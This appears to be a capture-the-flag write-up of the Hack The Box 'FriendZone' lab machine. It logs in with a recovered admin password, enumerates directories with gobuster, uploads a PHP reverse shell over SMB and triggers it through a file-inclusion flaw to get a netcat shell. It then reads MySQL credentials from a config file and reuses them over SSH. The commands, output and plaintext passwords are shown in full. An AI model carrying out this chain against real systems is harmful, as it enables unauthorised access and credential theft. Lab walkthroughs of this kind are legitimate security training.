6 administrator1.friendzone.red

Successful login using `admin:WORKWORKHhallelujah@#` at https://administrator1.friendzone.red/
Login Done ! visit /dashboard.php

https://administrator1.friendzone.red/dashboard.php

Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp

$ gobuster dir -u https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -x php                                            
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://administrator1.friendzone.red/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/06/06 14:57:47 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/login.php            (Status: 200) [Size: 7]
/dashboard.php        (Status: 200) [Size: 101]
/timestamp.php        (Status: 200) [Size: 36]
  • image_id = /images/<file_is_here>

  • pagename = <.php file>

  • We can upload a rev-shell using smb

$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (6.2 kb/s) (average 6.2 kb/s)
smb: \> ls
  .                                   D        0  Sun Jun  6 15:16:26 2021
  ..                                  D        0  Wed Jan 23 13:51:02 2019
  shell.php                           A     9141  Sun Jun  6 15:16:28 2021

Going to https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/shell
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 35382
SOCKET: Shell has connected! PID: 2044
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
grep -rnw /var/www -ie "friend" --color=always 2>/dev/null
<nw /var/www -ie "friend" --color=always 2>/dev/null
/var/www/friendzone/index.html:7:<center><h2>Ready to escape from friend zone !</h2></center>
/var/www/mysql_data.conf:1:for development process this is the mysql creds for user friend
/var/www/mysql_data.conf:3:db_user=friend
/var/www/html/index.html:1:<title>Friend Zone Escape software</title>

cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

SSH works using friend:Agpyu12!0.213$

Last updated